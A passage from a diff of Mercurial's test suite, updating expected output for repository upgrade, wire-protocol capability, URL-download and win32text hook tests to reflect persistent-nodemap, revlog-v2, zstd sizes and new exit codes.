+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog optimisations: re-delta-parent @@ -919,11 +957,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -940,7 +976,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog optimisations: re-delta-parent @@ -978,11 +1015,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -1007,7 +1042,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) 
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-fulladd @@ -1070,6 +1106,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1081,6 +1118,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1158,6 +1196,7 @@ > maxchainlen = 9001 > EOF $ hg config format + format.revlog-compression=$BUNDLE2_COMPRESSIONS$ format.maxchainlen=9001 $ hg debugdeltachain file rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio readsize largestblk rddensity srchunks @@ -1169,7 +1208,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-all @@ -1229,6 +1269,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1237,7 +1278,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog processed revlogs: @@ -1249,6 +1291,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1258,7 +1301,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) 
removed: sparserevlog processed revlogs: @@ -1270,6 +1314,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1284,7 +1329,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: revlog-compression-zstd, sparserevlog processed revlogs: @@ -1299,16 +1345,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zlib zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1320,7 +1369,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) removed: revlog-compression-zstd processed revlogs: @@ -1335,16 +1385,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zlib zlib zlib + compression: zlib zlib zlib (no-zstd !) + compression: zlib zlib zstd (zstd !) 
compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1359,7 +1412,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) added: revlog-compression-zstd processed revlogs: @@ -1374,16 +1428,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes - compression: zstd zstd zlib + compression: zlib zlib zlib (no-zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1400,10 +1457,12 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag (zstd !) - added: exp-sidedata-flag, sparserevlog (no-zstd !) + preserved: dotencode, fncache, generaldelta, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag (zstd !) + added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !) 
processed revlogs: - all-filelogs @@ -1417,20 +1476,22 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 @@ -1444,9 +1505,11 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - removed: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) + removed: exp-revlogv2.2, exp-sidedata-flag + added: revlogv1 processed revlogs: - all-filelogs @@ -1460,17 +1523,19 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: no no no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: no no no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) 
revlogv1 sparserevlog @@ -1487,9 +1552,11 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !) - added: exp-sidedata-flag + preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) + removed: revlogv1 + added: exp-revlogv2.2, exp-sidedata-flag processed revlogs: - all-filelogs @@ -1503,20 +1570,22 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - sidedata: yes yes no - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no + revlog-v2: yes yes no plain-cl-delta: yes yes yes compression: zlib zlib zlib (no-zstd !) - compression: zstd zstd zlib (zstd !) + compression: zstd zstd zstd (zstd !) compression-level: default default default $ cat .hg/requires dotencode + exp-revlogv2.2 exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) - revlogv1 sparserevlog store $ hg debugsidedata -c 0 diff --git a/tests/test-url-download.t b/tests/test-url-download.t --- a/tests/test-url-download.t +++ b/tests/test-url-download.t @@ -34,6 +34,8 @@ $ hg debugdownload ./null.txt 1 0000000000000000000000000000000000000000 + $ cat ../error.log + Test largefile URL ------------------ @@ -66,3 +68,5 @@ $ hg debugdownload "largefile://a57b57b39ee4dc3da1e03526596007f480ecdbe8" 1 0000000000000000000000000000000000000000 $ cd .. 
+ + $ cat error.log diff --git a/tests/test-url.py b/tests/test-url.py --- a/tests/test-url.py +++ b/tests/test-url.py @@ -275,7 +275,7 @@ def test_url(): """ >>> from mercurial import error, pycompat - >>> from mercurial.util import url + >>> from mercurial.utils.urlutil import url >>> from mercurial.utils.stringutil import forcebytestr This tests for edge cases in url.URL's parsing algorithm. Most of diff --git a/tests/test-win32text.t b/tests/test-win32text.t --- a/tests/test-win32text.t +++ b/tests/test-win32text.t @@ -38,7 +38,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ mv .hg/hgrc .hg/hgrc.bak @@ -77,7 +77,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ mv .hg/hgrc.bak .hg/hgrc $ echo hello > f @@ -109,7 +109,7 @@ transaction abort! rollback completed abort: pretxncommit.crlf hook failed - [255] + [40] $ hg revert -a forgetting d/f2 $ rm d/f2 @@ -286,7 +286,7 @@ transaction abort! rollback completed abort: pretxnchangegroup.crlf hook failed - [255] + [40] $ hg log -v changeset: 5:f0b1c8d75fce diff --git a/tests/test-wireproto-caching.t b/tests/test-wireproto-caching.t --- a/tests/test-wireproto-caching.t +++ b/tests/test-wireproto-caching.t @@ -1,5 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh + +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] diff --git a/tests/test-wireproto-command-capabilities.t b/tests/test-wireproto-command-capabilities.t --- a/tests/test-wireproto-command-capabilities.t +++ b/tests/test-wireproto-command-capabilities.t @@ -2,6 +2,13 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. 
+ + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no + > EOF + $ hg init server zstd isn't present in plain builds. Make tests easier by removing @@ -150,7 +157,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -190,7 +197,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -223,7 +230,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequi
red\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -484,7 +491,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions
\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending capabilities command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/capabilities HTTP/1.1\r\n diff --git a/tests/test-wireproto-command-rawstorefiledata.t b/tests/test-wireproto-command-rawstorefiledata.t --- a/tests/test-wireproto-command-rawstorefiledata.t +++ b/tests/test-wireproto-command-rawstorefiledata.t @@ -56,14 +56,17 @@ response: gen[ { b'filecount': 1, - b'totalsize': 527 + b'totalsize': 527 (no-zstd !) + b'totalsize': 530 (zstd !) }, { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) }, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 
